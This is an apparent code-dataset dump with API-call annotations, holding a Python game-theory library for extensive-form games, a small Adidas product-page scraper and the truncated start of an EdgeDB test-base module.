code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
r"""Implementation of games in extensive form.
The most important class of the module is ``ExtensiveFormGame'', which
provides support for n-player extensive form games, including chance moves.
It also provides support for a graphical representation of the game tree and
implementation for the backward induction algorithm, which is used to compute
subgame-perfect equilibrium strategies and equilibrium paths that are expected
to be played by perfectly rational agents.
References
----------
<NAME>, <NAME>, <NAME>, An Introductory
Course on Mathematical Game Theory, American Mathematical Society and Real
Sociedad Matemática Española, 2010. https://doi.org/10.1016/j.geb.2010.12.006.
"""
import networkx as nx
from networkx.algorithms.simple_paths import all_simple_edge_paths
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import pandas as pd
import random
from itertools import combinations
from copy import deepcopy
from typing import Any, Dict, List, Set, Tuple
class ExtensiveFormGame:
r"""Implementation of a game in extensive form.
The game is initialized 'empty', meaning with minimal attribute
assignments. Attributes are then set through the various methods. The
extensive form game is modelled as described in the reference, see the
chapter on extensive games.
Parameters
----------
**kwargs
Additional keyword arguments.
Attributes
----------
game_tree : networkx.DiGraph
Game tree, directed graph. Other than the methods and attributes of the
class, two additional attributes are set:
* root : Any
The root node, initialized to None.
* terminal_nodes : List[Any]
The list of terminal nodes, initialized to an empty list.
The game tree is initialized as empty.
information_partition : Dict[Any, List[Set[Any]]]
For every player (key), it maps it to the list of the information
sets (values).
is_perfect_informtion : bool, `True`
The game is initialized as being of perfect information.
players : List[Any]
List of players in the game. It is initialized empty.
probability : Dict[Any, Dict[Tuple[Any, Any], float]]
Probability distributions over the outgoing edges at every node where
chance takes an action. The keys are the nodes where chance acts. The
values are dictionaries mapping every outgoing edge from that node to
its probability.
turn_function : Dict[Any, Any]
Function that maps every non-terminal node to the player whose turn it
is to take an action at the node.
utility : Dict[Any, Dict[Any, float]]
For every terminal node, it maps the utility that the various players
(excluding chance) assign to it.
See Also
--------
networkx.DiGraph
"""
def __init__(self, **kwargs) -> None:
# players
self.players = []
# game tree
self.game_tree = nx.DiGraph()
self.game_tree.root = None
self.game_tree.terminal_nodes = []
# turn function
self.turn_function = {}
# information partition
self.information_partition = {}
self.is_perfect_information = True
# probability distribution over chance edges
self.probability = {}
# utility function
self.utility = {}
# additional info
for k, v in kwargs.items():
setattr(self, k, v)
def __check_player_in_game(self, player_id: Any) -> None:
r"""Check that the given player is actually in the game.
Parameters
----------
player_id : Any
Raises
------
ValueError
If the player is not in the game.
"""
if player_id not in self.players:
raise ValueError("player {} not in game".format(player_id))
def __check_nonterminal_node(self, node_id: Any) -> None:
r"""Check that a node is in the game tree.
Parameters
----------
node_id : Any
Raises
------
ValueError
If the node is not in the game tree.
"""
if node_id not in self.get_nonterminal_nodes():
raise ValueError("node {} is a terminal node".format(node_id))
def __check_terminal_node(self, node_id: Any) -> None:
r"""Check that a node is terminal.
Parameters
----------
node_id : Any
Raises
------
ValueError
If the node is not terminal.
"""
if node_id not in self.game_tree.terminal_nodes:
raise ValueError("node {} is not a terminal node".format(node_id))
def add_players(self, *players_id: Any) -> None:
r"""Add a lists of players to the game, encoded in any data structure.
Parameters
----------
players_id : List[Any]
Players to be added to the game. Exclude 'chance'.
Raises
------
ValueError
If 'chance' is among the players to be added.
"""
for p in players_id:
if p == 'chance':
raise ValueError("player 'chance' should not added to the \
game")
if p not in self.players:
self.players.append(p)
self.information_partition[p] = []
def add_node(self, node_id: Any, player_turn: Any = None,
is_root: bool = False) -> None:
r"""Add a node the game tree.
If the node is non-terminal and it is not a chance node, perfect
information is assumed. A set containing the single node is added to
the information partition of the player playing at the node.
Also, if the node is non-terminal (regardless of whether it is a
chance node or not), it is added to `turn_function` and its player is
assigned.
Parameters
----------
node_id : Any
Node to be added.
player_turn : Any, optional
Whose player has the turn at the node. If None is given, it is
assumed that the node is terminal. The default is None.
is_root : bool, optional
Whether the node is the root of the game tree. The default is False.
"""
self.game_tree.add_node(node_id)
# if player turn given
if player_turn:
self.turn_function[node_id] = player_turn
# add player to game if not already there
if player_turn not in self.players and player_turn != 'chance':
self.players.append(player_turn)
# if not a chance node, assume perfect information
if player_turn != 'chance':
self.__check_player_in_game(player_turn)
self.information_partition[player_turn].append({node_id})
# if player turn not given, it is a terminal node
else:
self.game_tree.terminal_nodes.append(node_id)
# assign as root if indicated
if is_root:
self.game_tree.root = node_id
def set_node_player(self, node_id: Any, player_turn: Any) -> None:
r"""Set the player at a node after it has been added to the game tree.
If the node had been designated as a terminal, remove it from that
list.
Parameters
----------
node_id : Any
The node whose player changes.
player_turn : Any
The new player that takes turn at the node.
"""
self.turn_function[node_id] = player_turn
# add player to game if not already there
if player_turn not in self.players and player_turn != 'chance':
self.players.append(player_turn)
# delete node from terminal nodes if there
if node_id in self.game_tree.terminal_nodes:
self.game_tree.terminal_nodes.remove(node_id)
def add_edge(self, from_node: Any, to_node: Any, label: Any) -> None:
r"""Add an edge to the game tree between two nodes.
Parameters
----------
from_node : Any
Origin node of the edge.
to_node : Any
Destination node of the edge.
label : Any
The edge label corresponsing to the action being take.
"""
self.game_tree.add_edge(from_node, to_node, action=label)
def get_nonterminal_nodes(self) -> List[Any]:
r"""Obtain the list of non-terminal nodes in the game tree.
Returns
-------
List[Any]
List of non-terminal nodes.
"""
nonterminal_nodes = []
for n in self.game_tree.nodes:
if n not in self.game_tree.terminal_nodes:
nonterminal_nodes.append(n)
return nonterminal_nodes
def get_theta_partition(self) -> Dict[Any, Set[Any]]:
r"""Get the turns partition.
The turns partition (or :math:`\Theta` partition) splits the
non-terminal nodes into disjunct sets, according to whose turn it is
to play at the node (including the 'chance' player).
Returns
-------
Dict[Any, Set[Any]]
For every player in the game, including 'chance', the set of nodes
where it is that player's turn to play.
"""
# initialize partitions to empty set
theta_partition = {}
for p in self.players:
theta_partition[p] = set()
theta_partition['chance'] = set()
# add nodes to their corresponding partition
for n in self.get_nonterminal_nodes():
node_turn = self.turn_function[n]
theta_partition[node_turn].add(n)
return theta_partition
def get_player_utility(self, player_id: Any) -> Dict[Any, float]:
r"""Return the utility function for the given player.
Parameters
----------
player_id : Any
Returns
-------
Dict[Any, float]
A map from every terminal node to the utility assigned to it by
the given player.
"""
self.__check_player_in_game(player_id)
utility_i = {}
for n in self.game_tree.terminal_nodes:
utility_i[n] = self.utility[n][player_id]
return utility_i
def get_available_actions(self, node: Any) -> Set[Any]:
r"""Get what actions are available at the given node.
Parameters
----------
node : Any
Returns
-------
Set[Any]
Set of available actions according to the game tree.
"""
actions = set()
for e in self.game_tree.out_edges(node):
a = self.game_tree.get_edge_data(*e)['action']
actions.add(a)
return actions
def get_choice_set(self, player_id: Any, information_set: Set[Any]) \
-> Set[Any]:
r"""Get the choice set for some player at some information set.
Parameters
----------
player_id : Any
information_set : Set[Any]
The information set for which the choice set is to be retrieved.
Returns
-------
List[Tuple[Any]]
List of edges outgoing from every node in the information set.
"""
self.__check_player_in_game(player_id)
assert information_set in self.information_partition[player_id], \
"information set {} does not belong to player {}'s information \
partition".format(information_set, player_id)
choice_set = self.get_available_actions(list(information_set)[0])
return choice_set
def get_utility_table(self) -> pd.DataFrame:
r"""Get a pandas dataframe with the utility for every player.
Returns
-------
utility_table : pandas.DataFrame
"""
data = {}
terminal_nodes = self.game_tree.terminal_nodes
data['Terminal node'] = terminal_nodes
for pos in self.players:
data[pos.capitalize()] = [self.utility[n][pos] for n in
terminal_nodes]
utility_table = pd.DataFrame(data)
utility_table.set_index('Terminal node', inplace=True)
return utility_table
def add_information_sets(self, player_id: Any,
*additional_info_sets: Set[Any]) -> None:
r"""Add an information set to the partition of the given player.
This method does not require that all nodes where ``player_id`` takes
an actions are included in some information set. It does check that all
the nodes in the information partition to be added belong to the theta
partition of ``player_id``, and that they have no been previously
included in some other information set.
Parameters
----------
player_id : Any
The game player whose information partition is to be expanded.
*additional_info_sets : Set[Any]
The information sets that are to be added.
"""
self.__check_player_in_game(player_id)
self.is_perfect_information = False
# check that the nodes in the information sets belong to the theta
# partition of the player
theta_partition = self.get_theta_partition()[player_id]
# check that the nodes in the additional information sets are not
# already in the information partition
all_sets = self.information_partition[player_id]
info_sets_union = [x for y in all_sets for x in y]
for s in additional_info_sets:
for n in s:
assert n in theta_partition, "node {} not in the turn \
function of player {}".format(n, player_id)
assert n not in info_sets_union, "node {} already in \
information partition of player {}".format(n, player_id)
for s in additional_info_sets:
self.information_partition[player_id].append(s)
def set_information_partition(self, player_id: Any,
*partition: Set[Any]) -> None:
r"""Set the information partition of the given player.
It is only useful to call this method when modeling games with
imperfect information, otherwise when nodes are added to the game tree
perfect information is assumed by default.
The method checks that all the nodes where it is the player's turn to
move are included in the information partition, and viceversa, that at
all the nodes in the various information sets it is the player's turn.
Also, it checks that all the nodes in any given information set have
the same number of outgoing edges, and that they are non-terminal.
Parameters
----------
player_id : Any
partition : Set[Any]
Information sets making up the player's information
partition.
Raises
------
AssertionError
If the union of information sets does not correspon to the same nodes
where it is the player's turn to play, or
If some nodes in the same information set have different amounts of
outgoing edges, or
If some node is terminal.
Notes
-----
Please note that the method does not check that all the information
sets provided are disjunct.
"""
self.__check_player_in_game(player_id)
self.is_perfect_information = False
# check that all the nodes where the player plays are included in the
# information partition
theta_player = self.get_theta_partition()[player_id]
nodes_in_info_sets = set()
for p in partition:
nodes_in_info_sets.update(p)
assert theta_player == nodes_in_info_sets, "the information set for\
player {} is missing some nodes".format(player_id)
for p in partition:
# check that all nodes in information set have the same available
# actions
all_avail_actions = [self.get_available_actions(n) for n in p]
assert all(av == all_avail_actions[0] for av in
all_avail_actions), "nodes in information set {} have \
different available actions".format(p)
# check that nodes are not terminal
for n in p:
self.__check_nonterminal_node(n)
# replace current partition with the new one
self.information_partition[player_id] = []
for p in partition:
self.information_partition[player_id].append(p)
def set_probability_distribution(self, node_id: Any,
prob_dist: Dict[Tuple[Any], float]) -> \
None:
r"""Set the probabilities over the outgoing edges of a chance node.
Parameters
----------
node_id : Any
Node over whose outgoing edges the probability is given.
prob_dist : Dict[Tuple[Any], float]
Probability distribution over the outgoing edges of the node.
Raises
------
ValueError
If at the given node, it is not chance's turn, or if one of the
provided edges does not have the given node as origin, or if there
is some edge going out from the node for which the probability
is not specified.
AssertionError
If the sum of the probabilities over all the edges is not close to
unity with :math:`10-^{3}` absolute tolerance.
"""
if self.turn_function[node_id] != 'chance':
raise ValueError("it is not chance's turn at node {}".
format(node_id))
outgoing_edges = self.game_tree.out_edges(node_id)
for e in prob_dist.keys():
if e not in outgoing_edges:
raise ValueError("edge {} is not an outgoing edge from {}"
.format(e, node_id))
for e in outgoing_edges:
if e not in prob_dist.keys():
raise ValueError("probability not specified for edge {}".
format(e))
assert np.isclose([sum(prob_dist.values())], [1], atol=1.E-3)[0], \
"sum over probability distribution of edges must be close to 1"
self.probability[node_id] = prob_dist
def set_uniform_probability_distribution(self, node_id: Any) -> None:
r"""Set a equal probabilities over the outgoing edges of a chance node.
Parameters
----------
node_id : Any
A node where chance takes its turn.
"""
outgoing_edges = self.game_tree.out_edges(node_id)
uniform_prob_dist = {e: 1/len(outgoing_edges) for e in outgoing_edges}
self.set_probability_distribution(node_id, uniform_prob_dist)
def set_utility(self, node_id: Any, utilities: Dict[Any, float]) -> None:
r"""Set the utility for all players at the given terminal node.
Parameters
----------
node_id : Any
A terminal node.
utilities : Dict[Any, float]
Dictionary that maps every player in the game to the utility it
assigns to the terminal node.
"""
self.__check_terminal_node(node_id)
self.utility[node_id] = {}
for pos, u in utilities.items():
self.__check_player_in_game(pos)
self.utility[node_id][pos] = u
def get_action_sequence(self, terminal_node: Any) -> \
Tuple[List[Tuple[str, str]], float]:
r"""Get the sequence of actions and probability to a terminal node.
Parameters
----------
terminal_node : Any
The terminal node to get the sequence of actions from the root.
Returns
-------
action_sequence : List[Tuple[str,str]]
The sequence of action from the root to the terminal node, as a
list of tuples of (player, action).
probability : float
The probability of the sequence of actions.
"""
self.__check_terminal_node(terminal_node)
paths = list(all_simple_edge_paths(self.game_tree, self.game_tree.root,
terminal_node))
assert len(paths) == 1, "path search has not return just one single \
path"
path = paths[0]
action_sequence = []
probability = 1
for (n1, n2) in path:
active_player = self.turn_function[n1]
if active_player == 'chance':
probability *= self.probability[n1][(n1, n2)]
continue
action = self.game_tree.get_edge_data(n1, n2)['action']
action_sequence.append((active_player, action))
return action_sequence, probability
def hierarchy_pos(G: Any, root: Any = None, width: float = 1.,
vert_gap: float = 0.2, vert_loc: float = 0,
xcenter: float = 0.5) -> Dict[Any, Tuple[float, float]]:
r"""From Joel's answer at https://stackoverflow.com/a/29597209/2966723.
Licensed under Creative Commons Attribution-Share Alike.
If the graph is a tree this will return the players to plot this in a
hierarchical layout.
Parameters
----------
G : Any
The graph (must be a tree). In practive, must be an instance of one of
the classes provided by `networkx`.
root : Any, optional
The root node of current branch. The default is None.
* If the tree is directed and this is not given, the root will be found
and used.
* If the tree is directed and this is given, then the players will be
just for the descendants of this node.
* If the tree is undirected and not given, then a random choice will be
used.
width : float, optional
Horizontal space allocated for this branch - avoids overlap with other
branches. The default is 1..
vert_gap : float, optional
Gap between levels of hierarchy. The default is 0.2.
vert_loc : float, optional
Vertical location of root. The default is 0.
xcenter : float, optional
Horizontal location of root. The default is 0.5.
Raises
------
TypeError
If the graph is not a tree.
Returns
-------
Dict[Any, Tuple[float, float]]
Mapping from every node in the tree to its layout player.
See Also
--------
networkx.is_tree
"""
if not nx.is_tree(G):
raise TypeError('cannot use hierarchy_pos on a graph that is not a \
tree')
if root is None:
if isinstance(G, nx.DiGraph):
root = next(iter(nx.topological_sort(G)))
else:
root = random.choice(list(G.nodes))
def _hierarchy_pos(G: Any, root: Any = None, width: float = 1.,
vert_gap: float = 0.2, vert_loc: float = 0,
xcenter: float = 0.5,
pos: Dict[Any, Tuple[float, float]] = None,
parent: Any = None):
r"""See hierarchy_pos for most arguments.
Parameters
----------
pos : Dict[Any, Tuple[float, float]]
A dictionary saying where all nodes go if they have been assigned.
Default is None.
parent : Any
Parent of this branch - only affects it if non-directed.
Default is None.
"""
if pos is None:
pos = {root: (xcenter, vert_loc)}
else:
pos[root] = (xcenter, vert_loc)
children = list(G.neighbors(root))
if not isinstance(G, nx.DiGraph) and parent is not None:
children.remove(parent)
if len(children) != 0:
dx = width/len(children)
nextx = xcenter - width/2 - dx/2
for child in children:
nextx += dx
pos = _hierarchy_pos(G, child, width=dx, vert_gap=vert_gap,
vert_loc=vert_loc-vert_gap, xcenter=nextx,
pos=pos, parent=root)
return pos
return _hierarchy_pos(G, root, width, vert_gap, vert_loc, xcenter)
def plot_game(game: ExtensiveFormGame,
player_colors: Dict[Any, str],
utility_label_shift: float = 0.03,
fig_kwargs: Dict[str, Any] = None,
node_kwargs: Dict[str, Any] = None,
edge_kwargs: Dict[str, Any] = None,
edge_labels_kwargs: Dict[str, Any] = None,
patch_kwargs: Dict[str, Any] = None,
legend_kwargs: Dict[str, Any] = None,
draw_utility: bool = True,
decimals: int = 1,
utility_label_kwargs: Dict[str, Any] = None,
info_sets_kwargs: Dict[str, Any] = None) -> plt.Figure:
r"""Make a figure of the game tree.
Encoded information:
* Node colors encode the turn function at every node.
* Dashed archs between nodes indicate information sets.
* Numbers in parenthesis below terminal nodes indicate utilities
(optional).
Parameters
----------
game : ExtensiveFormGame
A game in extensive form to be plotted.
player_colors : Dict[Any, str]
Dictionary mapping every player in the game to the color to use for the
nodes where it is the player's turn. Color white is not recommended, as
it is reserved for chance nodes.
utility_label_shift : float, optional
To adjust the utility labels under the terminal nodes.
The default is 0.03.
fig_kwargs : Dict[str, Any], optional
Additional keywork arguments related to the rendering of the figure -
they are passed to `matplotlib.pyplot.subplots`.
The default is None.
node_kwargs : Dict[str, Any], optional
Additional keyword arguments related to the rendering of the game tree
nodes - they are passed to `nx.draw_network`.
The default is None.
edge_kwargs : Dict[str, Any], optional
Additional keyword arguments related to the rendering of the game tree
edges - they are passed to `nx.draw_network`.
The default is None.
edge_labels_kwargs : Dict[str, Any], optional
Additional keyword arguments related to the rendering of the edge
labels - they are passed to `nx.draw_network_edge_labels`.
The default is None.
patch_kwargs : Dict[str, Any], optional
Additional keyword arguments related to the rendering of the legend
patches - they are passed to `matplotlib.patches.Patch`.
The default is None.
legend_kwargs : Dict[str, Any], optional
Additional keyword arguments related to the rendering of the legend -
they are passed to `matplotlib.axes.Axes.legend`.
The default is None.
draw_utility : bool, optional
Whether labels should be drawn below the terminal nodes displaying the
utilities for all players.
The default is True.
decimals : int, optional
The number of decimals places for the utility labels.
The default is 1.
utility_label_kwargs : Dict[str, Any], optional
Additional keyword arguments related to the rendering of the utility
labels at the terminal nodes - they are passed to
`matplotlib.pyplot.text`.
The default is None.
info_sets_kwargs : Dict[str, Any], optional
Additional keyword arguments related to the rendering of the archs
connecting the information sets - they are passed to
`matplotlib.patches.Arch`.
The default is None.
Returns
-------
fig : matplotlib.figure.Figure
"""
pos = hierarchy_pos(game.game_tree, game.game_tree.root)
fig, ax = plt.subplots(**fig_kwargs)
fig.patch.set_visible(False)
ax.axis('off')
# if there is chance in the game and it does not have a color, set it to
# white
if game.get_theta_partition()['chance'] != set():
if 'chance' not in player_colors.keys():
player_colors['chance'] = 'white'
# draw the game tree
node_col = []
for n in game.game_tree.nodes:
if n in game.game_tree.terminal_nodes:
col = 'silver'
else:
player = game.turn_function[n]
col = player_colors[player]
node_col.append(col)
nx.draw_networkx(game.game_tree, pos=pos, ax=ax, with_labels=True,
node_color=node_col, **node_kwargs, **edge_kwargs)
# prepare edge labels
edge_labels = {}
for e in game.game_tree.edges:
label = game.game_tree.get_edge_data(*e)['action']
parent_node = e[0]
parent_player = game.turn_function[parent_node]
# if edge is action from chance, add probability
if parent_player == 'chance':
prob = game.probability[parent_node][e]
label += ' ({:.2f})'.format(prob)
edge_labels[e] = label
# draw edge labels
nx.draw_networkx_edge_labels(game.game_tree, pos=pos, ax=ax,
edge_labels=edge_labels, **edge_labels_kwargs)
# draw legend
handles = []
for player, col in player_colors.items():
patch = mpatches.Patch(color=col, label=player, **patch_kwargs)
patch.set_edgecolor('black')
handles.append(patch)
ax.legend(handles=handles, **legend_kwargs)
# draw utility on terminal nodes
if draw_utility:
terminal_nodes = game.game_tree.terminal_nodes
for n in terminal_nodes:
utility_label_player = (pos[n][0], pos[n][1]-utility_label_shift)
utilities_node = ["{:.{prec}f}".
format(game.utility[n][p],
prec=decimals) for p in game.players
if p != 'chance']
utility_label = '{}'.format('\n'.join(utilities_node))
plt.text(*utility_label_player, utility_label, ha='center',
va='bottom', **utility_label_kwargs)
# draw archs between nodes in the same information set
for player in game.players:
if player == 'chance':
continue
for info_set in game.information_partition[player]:
if len(info_set) == 1:
continue
for u, v in combinations(info_set, r=2):
x = (pos[u][0] + pos[v][0])/2
y = (pos[u][1] + pos[v][1])/2
width = abs(pos[u][0] - pos[v][0])
height = 0.1
arch = mpatches.Arc((x, y), width, height, theta1=0,
theta2=180,
edgecolor=player_colors[player],
fill=False, **info_sets_kwargs)
ax.add_patch(arch)
plt.show()
plt.close(fig)
return fig
def backward_induction(game: ExtensiveFormGame, h: Any,
u_dict: Dict[Any, Dict[Any, float]] = {}) \
-> Dict[Any, Dict[Any, float]]:
r"""Compute the value of node `h` in a subgame by backward induction.
It computes the values of all the nodes in the subgame having `h` as its
root node. Only for games with perfect information.
Parameters
----------
game : ExtensiveFormGame
A game in extensive forms. Must be a perfect information game without
any stochastic effects (no `chance` nodes).
h : Any
The root of the subgame where to start computing.
u_dict : Dict[Any, Dict[Any, float]], optional
A dictionary of the values for every player at the nodes that have
already been revisited. The default is {}, and it should not be
modified. It is necessary to perform the recursion.
Returns
-------
Dict[Any, Dict[Any, float]]
A dictionary mapping, for each visited node (all the descendants of
`h`), the value assigned to it by every player in the game.
"""
if h in game.game_tree.terminal_nodes:
u_dict[h] = game.utility[h]
return u_dict
player = game.turn_function[h]
if player == 'chance':
u = {p: 0. for p in game.players}
else:
u = {p: -float('inf') for p in game.players}
u_dict[h] = u
for e in game.game_tree.out_edges(h):
child = e[1]
u_child = backward_induction(game, child, u_dict)[child]
if player == 'chance':
prob_edge = game.probability[h][e]
for pos in game.players:
u[pos] += prob_edge*u_child[pos]
else:
if u_child[player] > u[player]:
u = u_child
u_dict[h] = u
return u_dict
def subgame_perfect_equilibrium(game: ExtensiveFormGame) -> Dict[Any, Any]:
r"""Find a subgame perfect equilibrium in pure strategies.
Parameters
----------
game : ExtensiveFormGame
The game in extensive form.
Returns
-------
SPE : Dict[Any, Any]
A subgame perfect equilibrium in pure strategies, mapping each nodes to
the action to be taken.
"""
values_dict = backward_induction(game, game.game_tree.root)
SPE = {}
for n in game.game_tree.nodes:
if n in game.game_tree.terminal_nodes:
continue
player = game.turn_function[n]
if player == 'chance':
continue
next_value = -float('inf')
action = None
for e in game.game_tree.out_edges(n):
child = e[1]
if values_dict[child][player] > next_value:
next_value = values_dict[child][player]
action = (e, game.game_tree.get_edge_data(*e)['action'])
SPE[n] = action
return SPE
def DFS_equilibria_paths(game: ExtensiveFormGame, h: Any,
pure_strategy: Dict[Any, Any], path: List[Any],
probability: float,
path_store: List[Tuple[List[Any], float]]) -> None:
r"""Find all the equilibrium paths.
This function finds all of the paths given the deterministic strategy and
considering the chance nodes, and stores (path, probability) tuples in a
`store`.
Parameters
----------
game : ExtensiveFormGame
The game being played.
h : Any
The node where play starts.
pure_strategy : Dict[Any, Any]
A dictionary mapping every decision node to the (edge, action) pair to
be followed.
path : List[Any]
The path played before reaching the current node.
probability : float
The probability of playing the path played before reaching the current
node.
path_store : List[Tuple[List[Any], float]]
A store where the computed paths are stores alongside with their
probabilities of being played.
Examples
--------
The intended way to call this function is:
>>> path_store = []
>>> DFS_equilibria_paths(game, game.game_tree.root, pure_strat, [], 1, \
path_store)
>>> print(path_store)
"""
path.append(h)
# if the current node is a decision node
if h in pure_strategy.keys():
next_node = pure_strategy[h][0][1]
action = pure_strategy[h][1]
path.append(action)
DFS_equilibria_paths(game, next_node, pure_strategy, path, probability,
path_store)
# if the current node is a chance node
elif h in game.turn_function.keys() and game.turn_function[h] == 'chance':
prob_until_chance = probability
for e in game.game_tree.out_edges(h):
path_until_chance = deepcopy(path)
next_node = e[1]
action = game.game_tree.get_edge_data(*e)['action']
path_until_chance.append(action)
prob = prob_until_chance*game.probability[h][e]
DFS_equilibria_paths(game, next_node, pure_strategy,
path_until_chance, prob, path_store)
# if current node is terminal, append path to the store
else:
path_store.append((path, probability))
if __name__ == '__main__':
pass
| [
"matplotlib.pyplot.text",
"networkx.topological_sort",
"networkx.draw_networkx_edge_labels",
"matplotlib.patches.Arc",
"networkx.is_tree",
"networkx.DiGraph",
"networkx.draw_networkx",
"matplotlib.pyplot.close",
"itertools.combinations",
"networkx.algorithms.simple_paths.all_simple_edge_paths",
... | [((28008, 28034), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '(**fig_kwargs)\n', (28020, 28034), True, 'import matplotlib.pyplot as plt\n'), ((28609, 28730), 'networkx.draw_networkx', 'nx.draw_networkx', (['game.game_tree'], {'pos': 'pos', 'ax': 'ax', 'with_labels': '(True)', 'node_color': 'node_col'}), '(game.game_tree, pos=pos, ax=ax, with_labels=True,\n node_color=node_col, **node_kwargs, **edge_kwargs)\n', (28625, 28730), True, 'import networkx as nx\n'), ((29224, 29336), 'networkx.draw_networkx_edge_labels', 'nx.draw_networkx_edge_labels', (['game.game_tree'], {'pos': 'pos', 'ax': 'ax', 'edge_labels': 'edge_labels'}), '(game.game_tree, pos=pos, ax=ax, edge_labels=\n edge_labels, **edge_labels_kwargs)\n', (29252, 29336), True, 'import networkx as nx\n'), ((31063, 31073), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (31071, 31073), True, 'import matplotlib.pyplot as plt\n'), ((31078, 31092), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (31087, 31092), True, 'import matplotlib.pyplot as plt\n'), ((3028, 3040), 'networkx.DiGraph', 'nx.DiGraph', ([], {}), '()\n', (3038, 3040), True, 'import networkx as nx\n'), ((12213, 12231), 'pandas.DataFrame', 'pd.DataFrame', (['data'], {}), '(data)\n', (12225, 12231), True, 'import pandas as pd\n'), ((22692, 22705), 'networkx.is_tree', 'nx.is_tree', (['G'], {}), '(G)\n', (22702, 22705), True, 'import networkx as nx\n'), ((29463, 29518), 'matplotlib.patches.Patch', 'mpatches.Patch', ([], {'color': 'col', 'label': 'player'}), '(color=col, label=player, **patch_kwargs)\n', (29477, 29518), True, 'import matplotlib.patches as mpatches\n'), ((20313, 20386), 'networkx.algorithms.simple_paths.all_simple_edge_paths', 'all_simple_edge_paths', (['self.game_tree', 'self.game_tree.root', 'terminal_node'], {}), '(self.game_tree, self.game_tree.root, terminal_node)\n', (20334, 20386), False, 'from networkx.algorithms.simple_paths import all_simple_edge_paths\n'), ((30162, 30263), 'matplotlib.pyplot.text', 'plt.text', (['*utility_label_player', 'utility_label'], {'ha': '"""center"""', 'va': '"""bottom"""'}), "(*utility_label_player, utility_label, ha='center', va='bottom', **\n utility_label_kwargs)\n", (30170, 30263), True, 'import matplotlib.pyplot as plt\n'), ((30568, 30595), 'itertools.combinations', 'combinations', (['info_set'], {'r': '(2)'}), '(info_set, r=2)\n', (30580, 30595), False, 'from itertools import combinations\n'), ((30792, 30919), 'matplotlib.patches.Arc', 'mpatches.Arc', (['(x, y)', 'width', 'height'], {'theta1': '(0)', 'theta2': '(180)', 'edgecolor': 'player_colors[player]', 'fill': '(False)'}), '((x, y), width, height, theta1=0, theta2=180, edgecolor=\n player_colors[player], fill=False, **info_sets_kwargs)\n', (30804, 30919), True, 'import matplotlib.patches as mpatches\n'), ((35851, 35865), 'copy.deepcopy', 'deepcopy', (['path'], {}), '(path)\n', (35859, 35865), False, 'from copy import deepcopy\n'), ((22901, 22923), 'networkx.topological_sort', 'nx.topological_sort', (['G'], {}), '(G)\n', (22920, 22923), True, 'import networkx as nx\n')] |
from requests import get
from selectorlib import Extractor
def _adidas(adidas_url):
extractor = Extractor.from_yaml_string("""
name:
css: 'div.sidebar___2C-EP h1.gl-heading span'
xpath: null
type: Text
price:
css: 'div.sidebar___2C-EP div.gl-price-item'
xpath: null
type: Text
""")
headers = {
'authority': 'www.adidas.com',
'pragma': 'no-cache',
'cache-control': 'no-cache',
'dnt': '1',
'upgrade-insecure-requests': '1',
'user-agent':
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36',
'accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'sec-fetch-site': 'none',
'sec-fetch-mode': 'navigate',
'sec-fetch-dest': 'document',
'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8'
}
website = get(adidas_url, headers=headers)
productdata = extractor.extract(website.text)
return productdata
| [
"selectorlib.Extractor.from_yaml_string",
"requests.get"
] | [((102, 357), 'selectorlib.Extractor.from_yaml_string', 'Extractor.from_yaml_string', (['"""\n name:\n css: \'div.sidebar___2C-EP h1.gl-heading span\'\n xpath: null\n type: Text\n price:\n css: \'div.sidebar___2C-EP div.gl-price-item\'\n xpath: null\n type: Text\n """'], {}), '(\n """\n name:\n css: \'div.sidebar___2C-EP h1.gl-heading span\'\n xpath: null\n type: Text\n price:\n css: \'div.sidebar___2C-EP div.gl-price-item\'\n xpath: null\n type: Text\n """\n )\n', (128, 357), False, 'from selectorlib import Extractor\n'), ((1027, 1059), 'requests.get', 'get', (['adidas_url'], {'headers': 'headers'}), '(adidas_url, headers=headers)\n', (1030, 1059), False, 'from requests import get\n')] |
#
# This source file is part of the EdgeDB open source project.
#
# Copyright 2016-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import annotations
import asyncio
import atexit
import collections
import contextlib
import decimal
import functools
import inspect
import json
import math
import os
import pprint
import re
import unittest
import uuid
from datetime import timedelta
import click.testing
import edgedb
from edb import cli
from edb.server import cluster as edgedb_cluster
from edb.server import defines as edgedb_defines
from edb.common import taskgroup
from edb.testbase import serutils
def get_test_cases(tests):
result = collections.OrderedDict()
for test in tests:
if isinstance(test, unittest.TestSuite):
result.update(get_test_cases(test._tests))
else:
cls = type(test)
try:
methods = result[cls]
except KeyError:
methods = result[cls] = []
methods.append(test)
return result
class TestCaseMeta(type(unittest.TestCase)):
_database_names = set()
@staticmethod
def _iter_methods(bases, ns):
for base in bases:
for methname in dir(base):
if not methname.startswith('test_'):
continue
meth = getattr(base, methname)
if not inspect.iscoroutinefunction(meth):
continue
yield methname, meth
for methname, meth in ns.items():
if not methname.startswith('test_'):
continue
if not inspect.iscoroutinefunction(meth):
continue
yield methname, meth
@classmethod
def wrap(mcls, meth):
@functools.wraps(meth)
def wrapper(self, *args, __meth__=meth, **kwargs):
try_no = 1
while True:
try:
# There might be unobvious serializability
# anomalies across the test suite, so, rather
# than hunting them down every time, simply
# retry the test.
self.loop.run_until_complete(
__meth__(self, *args, **kwargs))
except edgedb.TransactionSerializationError:
if try_no == 3:
raise
else:
self.loop.run_until_complete(self.con.execute(
'ROLLBACK;'
))
try_no += 1
else:
break
return wrapper
@classmethod
def add_method(mcls, methname, ns, meth):
ns[methname] = mcls.wrap(meth)
def __new__(mcls, name, bases, ns):
for methname, meth in mcls._iter_methods(bases, ns.copy()):
